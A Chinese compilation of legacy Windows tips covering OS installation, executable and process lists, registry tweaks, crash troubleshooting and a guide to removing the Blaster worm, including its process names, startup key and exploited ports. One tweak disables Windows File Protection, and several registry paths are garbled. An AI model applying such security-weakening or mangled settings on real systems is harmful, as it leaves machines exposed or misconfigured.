    Windows 98安装程序进入“正在收集计算机的相关信息”界面，并对系统进行检查，以确保有足够的硬盘空间来安装Windows 98。完成后，即可按照提示，单击“下一步”按钮，选择“典型安装”方式，输入用户名和单位名称后，进入用户区域选择窗口，区域的选择主要是确定操作系统的系统时间以及日期，可以在列表中选择“中国”，然后单击“下一步”按钮。

    在安装过程中，安装程序会询问用户是否创建启动盘，如果你还没有自己的Windows 98启动盘，那么建议选择“确定”按钮创建，否则单击“取消”按钮。在接下来的过程中，就不必我们为之操心了，安装程序会向硬盘拷贝数据，并完成最后的安装过程。文件复制结束后，会提示重新启动计算机，重启后，即可直接进入Windows 98安装程序，并在左侧显示安装剩余时间，耐心地等待过后，你就会发现，Windows 98已经被安装到系统中了。

    小技巧：

    往往我们在安装Windows 98时，通常会在命令行状态下输入Setup命令进行安装，然后运行Scandisk、扫描磁盘、制作启动盘、安装版本说明等过程，如果打算要Windows快些安装，可以在使用Setup命令的时候，使用一些参数，从而达到快速安装Windows 98的目的。Setup的参数主要包括以下几个参数：

    /t:tmp：指定存放临时文件的目录

    /id：跳过磁盘空间检查

    /ie：不制作启动盘

    /ih：不检查注册表

    /im：跳过内存检查

    /is：不执行磁盘扫描

    /iv：安装时不显示版本说明

    我们想快速安装Windows 98，就可以输入命令：setup /id/ie/ih/im/is/iv，这样安装程序就会直接进入文件复制过程，从而省下了大量的安装时间。

    安装Windows Me

    Windows Me的安装可分为升级安装和完全安装两种类型，Windows Me可以从Windows 95、Windows 98和Windows 98 SE上直接升级安装，但不能从Windows 3.x中升级。

    Windows Me提供了三种安装方式，一是使用启动盘启动计算机，并进入安装目录执行Setup程序，需要注意的是，在执行安装程序之前，需要首先运行和加载磁盘高速缓存程序Smartdrv.exe。第二种方式是使用Windows Me光盘启动，自动执行安装程序。第三种方式是，在当前的操作系统中运行Windows Me的安装程序，比如在Windows 98系统中直接运行安装程序。

    无论采用哪种安装方式，其操作过程基本都是一样的，与前面介绍的Windows 98安装程序类似。

    如果你的电脑主频低于150MHz，那么会出现“在计算机上无法安装Windows，因为处理器低于150MHz，单击‘确定’退出安装程序”的提示，这时不要着急，可以输入命令：setup/nm即可开始安装了。

    另外，Windows Me的安装程序也存在一些参数(同Windows 98)。

    安装Windows 2000和Windows XP

    Windows 2000系统的安装可以在DOS和Windows 9x系统下直接安装，在光驱中放入Windows 2000安装盘后，会自动运行Windows 2000安装程序。选择全新安装后，会要求输入产品序列号，然后即可开始复制安装文件并重新启动计算机。

    在重新启动后的界面中，按下回车键则可以开始安装Windows 2000，并进入安装目录选择窗口，同时选择需要安装的盘符。在接下来的窗口中，会要求选择文件系统的格式，为了可以高效发挥Windows 2000系统性能，建议选择“将磁盘分区转换为NTFS”，完成后按下回车键即可根据向导提示完成Windows 2000系统的安装了。

    Windows XP安装方式包括三种，分别是升级安装、双系统共存安装和全新安装。它的安装方法与Windwos 2000系统安装方法类似，这里就不多做介绍了。

    如果是在DOS方式下安装Windows 2000/XP系统，首先需要运行Smartdrv.exe命令，这样才能使安装程序可以快速地安装，否则等待的时间将是非常漫长的。

    首先，我们用Windows 98启动盘启动电脑进入DOS模式，再执行Smartdrv.exe(如果软盘里没有该文件，可以从Windows 98的安装目录下的Command目录中获取)即可载入。然后执行Windows 2000/XP安装光盘中的i386目录下的Winnt.exe文件，记住：这里不是执行Setup.exe，而是Winnt.exe。以后的操作就比较简单了。

    安装多个操作系统

    在电脑中同时安装Windows 98和Windows 2000系统，可以首先安装Windows 98，然后在Windows 98系统中运行Windows 2000安装程序，这样就可以在计算机启动界面出现多重启动菜单，移动上下光标键并回车后即可选择进入相应的系统了。如果你打算让Windows Me系统与Windows 2000共存，最简单的方法是先安装好Windows Me，然后用Windows 98启动盘或者从光盘启动，安装Windows 2000，安装时选择“全新安装”方式。

    如果你打算让Windows 98、Windows 2000和Windows XP共存，可以首先安装Windows 98，然后在Windows 98下安装Windows 2000系统，最后在Windows 2000下安装Windows XP系统，在完成安装后即可形成多重启动菜单了。

windows下的EXE文件大揭密

当我们安装完Windows后，其中的文件到底是执行何种任务？某特定任务又由哪个文件来执行呢？ 还有，从“开始”--“程序”--再点击“我所要执行的任务”，这种套数还真有点繁琐。 若是知道经常要执行的任务是哪个文件、位于何处？把它在桌面上建立一快捷方式，岂不省时 省力又方便！这就需要对Windows下的可执行文件明明白白。（注：若是以下所述的可执行文件 不在Windows安装目录下，可能是因为你没有安装，可到“控制面板”--“添加/删除程序” --“Windows安装程序”，选取所要安装的组件。
本文假设Windows98安装在“C:\windows”下.
C:\Windows下的可执行文件
accstat.exe windows 辅助状态指示器
arp.exe tcp/ip地址转换协议命令
calc.exe 计算器应用软件
cdplayer.exe cd播放器附件
cleanmgr.exe 磁盘清理程序
clipbrd.exe 剪贴板查看应用程序
command.com ms－dos方式
control.exe 控制面板应用程序
cvt1.exe fat32转换器
defrag.exe 磁盘碎片整理应用程序
drvspace.exe 磁盘空间管理应用程序
dialer.exe 电话拨号程序
directcc.exe 直接电缆连接
explorer.exe 资源管理器
extrac32.exe windows cab 文件解压缩应用程序
fontview.exe 字体查看程序
filexfer.exe microsoft文件传输应用程序
finger.exe 用于获得来自于运行标准finger服务的任何系统的用户信息
freecell.exe 空当接龙游戏
grpconv.exe 程序组转换器
hostname.exe 返回tcp/ip配置窗口的dns标题头窗口中定义的计算机名字
ipconfig.exe 快速浏览系统tcp/ip配置应用程序
kodakprv.exe 映像预览应用程序
mplayer.exe 媒体播放机
mshearts.exe 红心大战游戏
nbtstat.exe 显示tcp/ip上的netbios（netbt）的状态
net.exe 一个非常全的网络配置、显示网络信息的命令,有详细帮助
netstat.exe 用于检查所有tcp、ip以及udp连接的统计情况
netdde.exe windows 网络dde（动态数据交换）
netwatch.exe 网络监视器
notepad.exe 记事本应用程序
packager.exe 对象包装应用程序
pbrush.exe 画笔应用程序
ping.exe 检测网络远端主机是否存在及判断网络是否正常的检测工具
progman.exe windows3.x中的程序管理器
qfecheck.exe 更新信息工具
regedit.exe 注册表编辑器
route.exe 用于管理本地tcp/ip路由表的应用程序
rsrcmtk.exe 显示资源状况
rundll32.exe 将dll作为应用程序运行
scandskw.exe 磁盘扫描应用程序
smartdrv.exe smartdrive（dos磁盘缓冲器）应用程序
sigverif.exe microsoft 签字应用程序
sndrec32.exe 录音机附件
sndvol32.exe 音量控制
sol.exe 纸牌游戏
sysmon.exe 系统监视器
taskman.exe 任务执行栏应用程序
taskmon.exe 任务监视器应用程序
telnet.exe 虚拟终端程序
tftp.exe 小文件传送协议，允许将文件传送给tftp服务器
tracert.exe 决定用户的系统与目标系统之间的路径
tuneup.exe windows 调整向导
vcmui.exe 版本冲突管理器
wangimg.exe 映像应用程序
welcome.exe 欢迎光临widows实用程序
winfile.exe windows3.x中的文件管理器
winhelp.exe 16位的windows 帮助程序
winhlp32.exe 32位的windows 帮助程序
wininit.exe windows 安装初始化应用程序
winipcfg.exe tcp/ip 配置实用程序
winmine.exe 扫雷游戏
winpopup.exe windows 弹出式消息实用程序
winver.exe 显示windows 版本号
write.exe 写字板附件
winrep.exe windows 报告工具
winalign.exe 排列本地文件应用程序
wupdmgr.exe windows 更新工具

Windows XP 常见的进程列表

最基本的系统进程（也就是说，这些进程是系统运行的基本条件，有了这些进程，系统
就能正常运行）

smss.exe Session Manager
csrss.exe 子系统服务器进程
winlogon.exe 管理用户登录
services.exe 包含很多系统服务
lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。
(系统服务)
产生会话密钥以及授予用于交互式客户/服务器验证的服务凭据(ticket)。(系统服务)
svchost.exe 包含很多系统服务
svchost.exe
SPOOLSV.EXE 将文件加载到内存中以便迟后打印。(系统服务)
explorer.exe 资源管理器
internat.exe 托盘区的拼音图标

附加的系统进程（这些进程不是必要的，你可以根据需要通过服务管理器来增加或减
少）
mstask.exe 允许程序在指定时间运行。(系统服务)
regsvc.exe 允许远程注册表操作。(系统服务)
winmgmt.exe 提供系统管理信息(系统服务)。
inetinfo.exe 通过 Internet 信息服务的管理单元提供 FTP 连接和管理。(系统服务)
tlntsvr.exe 允许远程用户登录到系统并且使用命令行运行控制台程序。(系统服务)
允许通过 Internet 信息服务的管理单元管理 Web 和 FTP 服务。(系统服务)
tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。远程安装服务
的一部分。(系统服务)
termsrv.exe 提供多会话环境允许客户端设备访问虚拟的 Windows 2000
Professional 桌面会话以及运行在服务器上的基于 Windows 的程序。(系统服务)
dns.exe 应答对域名系统(DNS)名称的查询和更新请求。(系统服务)

以下服务很少会用到，上面的服务都对安全有害，如果不是必要的应该关掉
tcpsvcs.exe 提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000
Professional 的能力。(系统服务)
支持以下 TCP/IP 服务：Character Generator, Daytime, Discard, Echo, 以及
Quote of the Day。(系统服务)
ismserv.exe 允许在 Windows Advanced Server 站点间发送和接收消息。(系统服
务)
ups.exe 管理连接到计算机的不间断电源(UPS)。(系统服务)
wins.exe 为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。
(系统服务)
llssrv.exe License Logging Service(system service)
ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。(系统服务)
RsSub.exe 控制用来远程储存数据的媒体。(系统服务)
locator.exe 管理 RPC 名称服务数据库。(系统服务)
lserver.exe 注册客户端许可证。(系统服务)
dfssvc.exe 管理分布于局域网或广域网的逻辑卷。(系统服务)
clipsrv.exe 支持“剪贴簿查看器”，以便可以从远程剪贴簿查阅剪贴页面。(系统
服务)
msdtc.exe 并列事务，是分布于两个以上的数据库，消息队列，文件系统，或其
它事务保护资源管理器。(系统服务)
faxsvc.exe 帮助您发送和接收传真。(系统服务)
cisvc.exe Indexing Service(system service)
dmadmin.exe 磁盘管理请求的系统管理服务。(系统服务)
mnmsrvc.exe 允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。(系统服
务)
netdde.exe 提供动态数据交换 (DDE) 的网络传输和安全特性。(系统服务)
smlogsvc.exe 配置性能日志和警报。(系统服务)
rsvp.exe 为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制
安装功能。(系统服务)
RsEng.exe 协调用来储存不常用数据的服务和管理工具。(系统服务)
RsFsa.exe 管理远程储存的文件的操作。(系统服务)
grovel.exe 扫描零备份存储(SIS)卷上的重复文件，并且将重复文件指向一个数据存
储点，以节省磁盘空间。(系统服务)
SCardSvr.exe 对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。(系统
服务)
snmp.exe 包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。(系
统服务)
snmptrap.exe 接收由本地或远程 SNMP 代理程序产生的陷阱消息，然后将消息传递
到运行在这台计算机上 SNMP 管理程序。(系统服务)
UtilMan.exe 从一个窗口中启动和配置辅助工具。(系统服务)
msiexec.exe 依据 .MSI 文件中包含的命令来安装、修复以及删除软件。(系统服务)

xp的boot.ini文件内容

[boot loader]
timeout=3
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Profession"

windowsXP你不可不知道的秘密哦！~

自从微软发布Windows XP以来，Windows XP已经得到人们越来越广泛的应用，微软也宣称它是迄今为止最好的操作系统。Windows XP到底有什么出色的地方？让我秒杀先来告诉你其中的一些小秘密吧！
●关闭自动播放功能
   一旦您将媒体插入驱动器，自动运行就会从驱动器中读取数据，这会造成程序的设置文件和在音频媒体上的音乐立即开始。你可以用下面这个办法关闭这个功能：点“开始”→“运行”，在对话框中输入“gpedit.msc” →“计算机配置”→“管理模板”→“系统”，双击“关闭自动播放”，在“设置”中选“已启用”，确定即可。
●使ZIP文档读取能力失效
  Windows XP默认支持.ZIP文档，但系统会为此耗费大量资源，你可以将这一功能关闭，只需在“开始”选单的“运行”中输入“regsvr32/u zipfldr.dll”即可。
●卸载无用的动态链接
  资源管理器经常在内存中留下无用的动态链接，为了消除这种现象，你可以打开注册表编辑器，设置键值：HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionxplorer AlwaysUnloadDLL=DWORD: 1将其设为0，这一功能就会被关闭。注意：为了让设置生效，需要重新启动计算机。
●消除Windows文档保护功能
为了完全消除Windows文档保护功能，打开注册表编辑器，设置键值：HKEY_LOCAL_MACHINE SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon SFCDisable=0xFFFFFF9D
●查看驱动器组件信息
右键点击“我的电脑”，点选弹出选单中的“管理”，依次打开“可移动存储”→“库”，用右键点击所要查询的驱动器，点选弹出选单中的“属性”，点选“设备信息”就可看到驱动器的信息了。
●在关机时清空页面文件
打开“控制面板”，点击“管理工具”→“本地安全策略”→“本地策略”→“安全选项”，双击其中“关机：清理虚拟内存页面文件”一项，点击弹出选单中的“已启用”选项，单击“确定”即可。


电脑维修精华帖3

《一键清理系统垃圾》

电脑维修精华帖3

    【关闭系统时的死机】
    在退出操作系统时出现的死机是指在退出windows系统或者退回dos状态时出现的死机现象。windows如果不能彻底关机，就会把磁盘缓冲区里的数据写到硬盘上，然后进入一个死循环，除非用户重新启动系统，否则是无法关闭系统的。造成这一现象的原因可能与操作系统设置和某些驱动程序设置不当有关，一般windows在退出系统或者退回dos状态时都会关闭正在使用的驱动程序，而这些驱动程序也会根据当时的情况进行一次数据回写操作，但要是驱动程序设置不当，驱动程序就找不到使用设备，因此它就不停地进行设备的搜索动作，从而形成一种假死机现象。

     总之引起死机的原因很多，不管怎样，我们处理死机问题的一般方法就是先软后硬，即先考虑应用软件后考虑硬件故障，重点应放在软件方面，具体就是主要在应用软件的安装设置和一些驱动程序的安装设置方面来查找原因。最后再查找硬件方面的原因，一般硬件方面的原因都可以通过系统设置中的设备管理或者可以从windows操作系统附件的系统信息中查找到。

处理冲击波

    病毒中文名：冲击波(包括很多变种)
    病毒类型：蠕虫病毒
    攻击对象：Windows NT 4.0，Windows 2000，Windows XP，Windows Server 2003等
    传播途径：“冲击波”是一种利用Windows系统的RPC(远程过程调用，是一种通信协议，程序可使用该协议向网络中的另一台计算机上的程序请求服务)漏洞进行传播、随机发作、破坏力强的蠕虫病毒。它不需要通过电子邮件(或附件)来传播，更隐蔽，更不易察觉。它使用IP扫描技术来查找网络上操作系统为Windows 2000/XP/2003的计算机，一旦找到有漏洞的计算机，它就会利用DCOM(分布式对象模型，一种协议，能够使软件组件通过网络直接进行通信)RPC缓冲区漏洞植入病毒体以控制和攻击该系统。
    中毒症状：
    1.系统资源紧张，应用程序运行速度异常；
    2.网络速度减慢，“DNS”和“ⅡS”服务遭到非法拒绝，用户不能正常浏览网页或收发电子邮件；
    3.不能进行复制、粘贴操作；
    4.Word、Excel、PowerPoint等软件无法正常运行；
    5.系统无故重启，或在弹出“系统关机”警告提示后自动重启等等。

    应急办法：
    如果不小心感染病毒，可以使用如下步骤进行查杀：
    1.关闭“系统关机”提示框
    在出现关机提示时，在“开始→运行”中输入“shutdown -a”，即可取消“系统关机”提示框，该方法确保用户有足够的时间下载补丁。
    2.下载针对“冲击波”的补丁
    Windows 2000简体中文版补丁下载地址：http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&familyid=c8b8a846-f541-4c15-8c9f-220354449117
    Windows XP 简体中文版(32位)补丁下载地址：
    http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&familyid=2354406c-c5b6-44ac-9532-3de40f69c074
    Windows Server 2003 中文版(32位))补丁下载地址：
    http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&familyid=f8e0ff3a-9f4c-4061-9009-3a212458e92e
    在下载补丁时，要注意不同的操作系统、不同的版本均有不同的补丁，不可混淆。安装补丁时，盗版Windows XP系统可能不能正常安装，Windows 2000操作系统则必须升级SP2以上版本才可安装。
    Windows2000 Service Pack 4简体中文版下载地址：http://download.microsoft.com/download/4/1/4/4140e2e0-0ad9-4438-ac52-da0e0429c0e6/w2ksp4_cn.exe
    3.下载专杀工具
    瑞星“冲击波(Worm.Blaster))”病毒专杀工具下载地址：http://download.rising.com.cn/zsgj/ravzerg.exe
    金山“冲击波(Worm.Blaster))”病毒专杀工具下载地址：http://www.duba.net/download/othertools/duba_sdbot.exe
    4.脱机杀毒
    断开网络连接，然后运行专杀工具，这些工具体积小巧，操作简单，按照提示操作即可。
    手工清除：
    如果想体验一下手工杀毒的乐趣，可以按以下步骤操作：
    1.中止进程
    按“Ctrl+Alt+Del”组合键，在“Windows 任务管理器”中选择“进程”选项卡，查找“msblast.exe”(或“teekids.exe”、“penis32.exe”)，选中它，然后，点击下方的“结束进程”按钮。
    提示：如不能运行“Windows 任务管理器”，可以在“开始→运行”中输入“cmd”打开“命令提示符”窗口，输入以下命令“taskkill.exe /im msblast.exe”(或“taskkill.exe /im teekids.exe”、“taskkill.exe /im penis32.exe”)。
    2.删除病毒体
    依次点击“开始→搜索”，选择“所有文件和文件夹”选项，输入关键词“msblast.exe”，将查找目标定在操作系统所在分区。搜索完毕后，在“搜索结果”窗口将所找到的文件彻底删除。然后使用相同的方法，查找并删除“teekids.exe“和“penis32.exe”文件。
    提示：在Windows XP系统中，应首先禁用“系统还原”功能，方法是：右击“我的电脑”，选择“属性”，在“系统属性”中选择“系统还原”选项卡，勾选“在所有驱动器上关闭系统还原”即可。
    如不能运行“搜索”，可以在“开始→运行”中输入“cmd”打开“命令提示符” 窗口，输入以下命令：
    “del 系统盘符\winnt\system32\msblast.exe”(Windows 2000系统)或“del系统盘符\windows\system\msblast.exe”(Windows XP系统)
    3.修改注册表
    点击“开始→运行”，输入“regedit”打开“注册表编辑器”，依次找到“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”，删除“windows auto update=msblast.exe”(病毒变种可能会有不同的显示内容)。
    4.重新启动计算机
    重启计算机后，“冲击波”病毒就已经从系统中完全清除了。
    防 御：
    可以通过系统升级、优化网络设置和使用第三方软件的方法来增强系统的安全性能。
    系统升级防病毒
    安装针对“冲击波”的补丁后，怎样确认补丁已经正确安装呢？我们可以通过查看注册表的方法来确认，方法如下：在“开始→运行”中输入“regedit”，打开“注册表编辑器”，查看相应的注册表信息：
    “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP5\KB823980”(Windows 2000系统)
    “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP2\KB823980”(Windows XP系统)
    “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Window Server 2003\SP1\KB823980”(Windows Server 2003系统)
    禁用端口防病毒
    “冲击波”病毒是利用系统的135、137、138、139、445、593端口，以及UDP端口69(TFTP))和TCP端口4444入侵系统的，只要禁用了这些端口就能有效地防范此类病毒。
    1.手工设置
    手工禁用端口的方法如下(以Windows 2000为例)：
    打开“控制面板”，双击“网络连接”，右击“本地连接”，选择“属性”，在“本地连接属性”窗口中，选择“Internet”协议，点击“高级”按钮，然后在“高级TCP/IP设置”窗口中选择“选项”选项卡，双击“TCP/IP筛选”即可进入设置窗口。选择“只允许”，则用户只能使用设定的端口，这样就可以达到禁用危险端口的目的。一般而言，如果我们的计算机只是工作站而不是服务器，就可以只开放如下端口：TCP：80，UDP：6，IP协议：17。
    提示：不同的应用程序可能会要求使用系统不同的端口，比如FTP软件需要用到TCP21端口等，请按照各程序的说明文件进行相应的设置。
    2.使用防火墙软件
    对普通用户而言，手工设置可能会比较困难，笔者建议使用专门的防火墙软件，如Norton Internet Security、金山网镖、瑞星个人防火墙、天网防火墙个人版等。
    启用Internet连接防火墙
    对于使用 Windows XP或Windows Server 2003的用户来说，系统内置的Internet连接防火墙就能有效地阻止来自Internet的入站RPC通信信息，从而免受此类病毒的影响。操作方法为：进入“开始→控制面板”，双击“网络连接”，右击“本地连接”，选择“属性”，在“属性”窗口中点击“高级”按钮，就可以看到“Internet 连接防火墙”，勾选“通过限制或阻止来自Internet的对此计算机的访问业保护我的计算机和网络”即可。
    禁用DCOM防病毒
    DCOM是一种能够使软件组件通过网络直接进行通信的协议。如果一台计算机是网络的一部分，则该计算机上的COM对象将能够通过DCOM网络协议与另一台计算机上的COM对象进行通信。通过禁用DCOM，可以帮助计算机防范“冲击波”，具体操作方法如下：
    在“开始→运行”中输入“Dcomcnfg.exe”，打开“组件服务”窗口；单击“控制台根节点”下的“组件服务”，再打开“计算机”子文件夹；然后右击“我的电脑”，选择“属性”(对于本地计算机)，或者右击“计算机”文件夹，选择“新建→计算机”，输入计算机名称，再右击该计算机名称，然后选择“属性”(对于远程计算机)；然后选择“默认属性”选项卡，取消“在这台计算机上启用分布式COM”复选框上的钩即可。
    提示：禁用DCOM会阻断该计算机上的对象与其他计算机上的对象之间的所有通信，请慎重选择。
    几点注意：
    1.安装专业的防火墙和防病毒软件，并激活“实时防护”功能，并且经常更新病毒库；
    2.激活系统的自动更新功能，及时下载安装最新的安全补丁，未雨绸缪；
    3.优化与系统安全相关的参数，修改部分缺省值，关闭或删除系统中不需要的服务；
    4.养成良好的网络安全观念，不访问不健康网站，不随意打开来历不明的邮件及附件，不要执行从Internet下载的未经杀毒处理的软件；
    5.尽量使用复杂的密码，提高计算机的安全系数；
    6.发现病毒时，应该迅速断开网络连接，隔离受感染的计算机。

磁盘格式的问题
1、什么是NTFS？

    想要了解NTFS，我们首先应该认识一下FAT。FAT(File Allocation Table)是“文件分配表”的意 思。对我们来说，它的意义在于对硬盘分区的管理。FAT16、FAT32、NTFS是目前最常见的三种文件系统。

    FAT16：我们以前用的DOS、Windows 95都使用FAT16文件系统，现在常用的Windows 98/2000/XP等系统均支持FAT16文件系统。它最大可以管理大到2GB的分区，但每个分区最多只能有65525个簇（簇是磁盘空间的配置单位）。随着硬盘或分区容量的增大，每个簇所占的空间将越来越大，从而导致硬盘空间的浪费。

    FAT32：随着大容量硬盘的出现，从Windows 98开始，FAT32开始流行。它是FAT16的增强版本，可以支持大到2TB（2048GB)的分区。FAT32使用的簇比FAT16小，从而有效地节约了硬盘空间。

    NTFS：微软Windows NT内核的系列操作系统支持的、一个特别为网络和磁盘配额、文件加密等管理安全特性设计的磁盘格式。随着以NT为内核的Windows 2000/XP的普及，很多个人用户开始用到了NTFS。NTFS也是以簇为单位来存储数据文件，但NTFS中簇的大小并不依赖于磁盘或分区的大小。簇尺寸的缩小不但降低了磁盘空间的浪费，还减少了产生磁盘碎片的可能。NTFS支持文件加密管理功能，可为用户提供更高层次的安全保证。

    2、什么系统可以支持NTFS文件系统？

    只有Windows NT/2000/XP才能识别NTFS系统，Windows 9x/Me以及DOS等操作系统都不能支持、识别NTFS格式的磁盘。由于DOS系统不支持NTFS系统，所以最好不要将C:盘制作为NTFS系统，这样在系统崩溃后便于在DOS系统下修复。

    NTFS与操作系统支持情况表

    文件系统　　　　支持的操作系统
    FAT16　　　　windows 95/98/Me/NT/2000/XP Unix，Linux，DOS
    FAT32　　　　windows 95/98/Me/2000/XP
    NTFS　　　　 windows nt/2000/XP

电脑死机故障分析

每个使用过电脑的人恐怕都遇到过死机现象，电脑的死机确实是一件很烦人的事，有时还会给您带来不小的损失，但是这个问题也确实是很复杂的，死机既有可能是硬件上的暇弊，也有可能是软件中的bug，当然还有可能就是您的“非法操作”。下面想就一些实例来具体问题具体分析一番：

   显卡原因
    Q 一台电脑发生经常性的死机现象，启动电脑，会有三声报警声，显示器有时不能点亮，但主机工作正常，在设置成32位色彩后，死机更加频繁。为什么?
    A 造成以上情况死机的原因可能有两个：一个是显示卡散热不好造成的工作不正常，另一个原因是显卡和主板的兼容性不好。在设置成高位色后的死机，很可能是显卡显示功能比较弱，在更高位色的情况下保证不了原来的分辨率，看来这个问题主要是出自显卡上。

   电源原因
    Q 电脑一直使用很好，但最近一段时间偶尔出现启动过程中的死机，并不是每一次都这样，有时候需要两三次才能顺利地启动。为什么?
    A 由于以前使用情况一直很好，一般可以排除是硬件上的兼容性问题，而在启动过程中的死机，屏幕上又没有给出相关的信息，所以也不很像是软件的问题，所以最有可能就是由于电源的老化或者超负荷造成的，一般更换电源检验一下就可以。

   驱动程序原因
    Q 在升级Win 98过程中，出现“按立即启动按钮，计算机将立即重新启动，否则15秒后计算机将自动重新启动。”对话框，但启动后，蓝屏死机。为什么?
    A 由于是在安装系统中的死机，多半是由于硬件设备的冲突造成的，可以先将除显卡以外的其他扩展插卡拔掉，然后再重新安装Win 98，如仍出现上述情况，有可能是Win 98系统对原显卡的驱动程序不兼容造成的，可以在开机时选择进入安全模式，然后在控制面板中升级显卡的驱动程序。

   DOS启动原因
    Q 电脑在启动后出现“Starting Windows 98”信息时，随即死机。为什么?
    A 此种情况下的死机，很可能是由于Win 98的DOS启动部分受到破坏所至，因为此时还尚未进入到Win 98的系统中，解决此问题需要用到Win 98的启动软盘，用启动盘来重新启动电脑后，然后在DOS状态下输入“sys c:”命令，这样可以修复硬盘中的DOS引导系统，问题应该可以解决，但需要注意的是，启动盘必须是用与当前操作系统版本一致的，否则将破坏Windows系统。

   虚拟内存原因
    Q 在Win 9x下运行大型的应用程序时，出现硬盘灯狂闪，随即就死机了。为什么?
    A 这是我们经常会遇到的一种死机情况，这个问题大多是和设置的虚拟内存有关。如果本身的内存就比较小，而又运行了大型的应用程序，这时就需要有较大的虚拟内存，但如果这时的虚拟内存恰恰不够了，就会造成上述的死机了。所以建议您最好是将虚拟内存的容量设置得稍大一点，并且经常删除一些临时的虚拟文件。

   注册表原因
    Q 关于Win 9x注册表损坏而引起的死机现象。怎样解决?
    A Windows系统中的注册表是一个很危险的地方，一般情况下不要修改。出现误删的问题，可以将备份的注册表恢复过来。具体方法是启动电脑到纯DOS状态下，然后进入到Windows的目录下，执行一下命令：
    attrib －h －r －s system.da0
    atttib －h －r －s user.da0
    copy system.da0 system.dat
    copy user.da0 user.dat
    最后重新启动电脑。

   引导程序原因
    Q 电脑在开机自检后，在屏幕上显示“No ROM Basic，System Halted”信息后死机，硬盘等也不再闪烁。为什么?
    A 造成这一故障的原因是硬盘的引导程序破坏或者是受病毒侵害，还有可能是主引导区的最后两个字节“55AAH”被改写，因为这两个字节一旦被改写，那么系统就不再认为有硬盘存在了，所以操作系统也就无法启动了。解决方法是用软盘启动电脑，在DOS状态下，执行“FDISK/MMR"命令，这样就可以使正确的主引导程序和结束标识覆盖在硬盘的主引导区上。

   安装操作系统原因
    Q 在电脑启动时，屏幕上出现了“Error Loading Operation System”的相关信息，然后就死机了。为什么?
    A 以上显示信息的意思是：装载操作系统错误。这是在读取分区引导扇区出错时才提示的。可能是因为：
    1、分区表指示的分区起始地址不正确。
    2、分区引导扇区所在磁道的磁道标志和扇区ID损坏，找不到指定的扇区。
    3、驱动器读电路故障，但这种情况比较少见，多数是随机性读错误，因为系统引导进行到此处，应该说已正确地读出了一个主引导扇区。

    解决上述的问题，需要借助像诺顿的磁盘医生NDD之类的修复软件来回复硬盘的分区表

更改IE的默认搜索引擎
    问：我使用的系统是Windows XP。我用超级兔子IE保护器的功能把搜索引擎改为百度的http://www.baidu.com/baidu，可现在超级兔子IE保护器显示的搜索引擎是百度，但实际使用的还是微软的搜索引擎。请问我该怎么办？

    答：首先纠正一下，百度的搜索引擎是http://www.baidu.com。在注册表编辑器中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch和HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant，将这两个键值修改为：http://www.baidu.com。如果由于某种原因确实不能修改，你可以到http://bar.baidu.com安装一个百度搜霸或IE搜索伴侣。它会自动将IE的默认搜索引擎更改为百度的搜索引擎。

更改临时文件夹的路径
问：我使用的系统为Windows XP，我想把系统临时文件(Temp文件)存放区由C盘移到其他分区(如D盘)，请问该如何操作？

答：在“我的电脑”上点鼠标右键，选择“属性”，然后进入高级选项，点“环境变量”，在“系统变量”下拉菜单中找到“TEMP”、“TMP”这两项，分别编辑，将变量值设为你需要改变的路径(例如D:\temp)，注意两项改为相同路径，然后在D盘上建立一个temp目录，最后重启计算机即可。

更改屏幕保护程序关联方式
    问：最近不知道做了什么操作，双击电脑上的屏幕保护程序文件(扩展名为SCR)后，会自动用写字板打开。请问如何正确打开屏幕保护程序呢？

    答：屏幕保护程序是由系统直接调用的。如果你想修改为默认的模式，打开注册表编辑器，找到HKEY_CLASSES_ROOT\scrfile\shell\open\command，双击右边窗格里面的默认值，然后输入：“"%1" /S”(不包括全角引号，注意%1是被半角引号保护起来的)，确定；然后找到HKEY_CLASSES_ROOT\.scr，确认右边的默认值是“scrfile”(不包括引号)即可。

调整调出输入法的顺序
    1.修改注册表法：
    在注册表编辑器(在“开始/运行”对话框中输入“REGEDIT”)中展开：“HKEY_CURRENT_USER\Keyboard Layout\Preload”分支，可看到名为”1”、”2”、”3”…的文件夹，它们分别顺序对应输入法菜单中的各项输入法。假设当前输入法菜单中，全拼对应的文件名是2，智能ABC对应的文件名是5，可先将5改为6(点右键选“重命名”即可修改)，然后将2改为5，再将6改为2，最后重启系统。可看到输入法菜单中全拼和智能ABC的位置调换了。(辽宁 王岩)

    2.快捷键法：
    打开“控制面板”，双击“输入法”，启动“输入法属性”对话框，选择“热键”选项卡。通过“基本键”和“组合键”为各输入法定义不同的快捷键。如将“王码五笔输入法”定义快捷键为“Ctrl+Alt+5”，以后要使用五笔输入法，按下“Ctrl+Alt+5”组合键即可。此法虽未实际调整输入法位置，但在你心中却有一明了的顺序，可让你随意调出。

    注：此方法只适合Win9X/2000。

    3.软件法
    我们可以用《Windows优化大师》或《超级魔法兔子》等软件来调整。运行《Windows优化大师》后，进入“系统个性设置”选项卡中的“输入法顺序”，选中任一输入法后，通过右边的“向上”、“向下”按键，调整到合适位置即可；同样，“超级魔法兔子”也用一个“输入法”选项供调整。(重庆 安顺)

    4.重装法
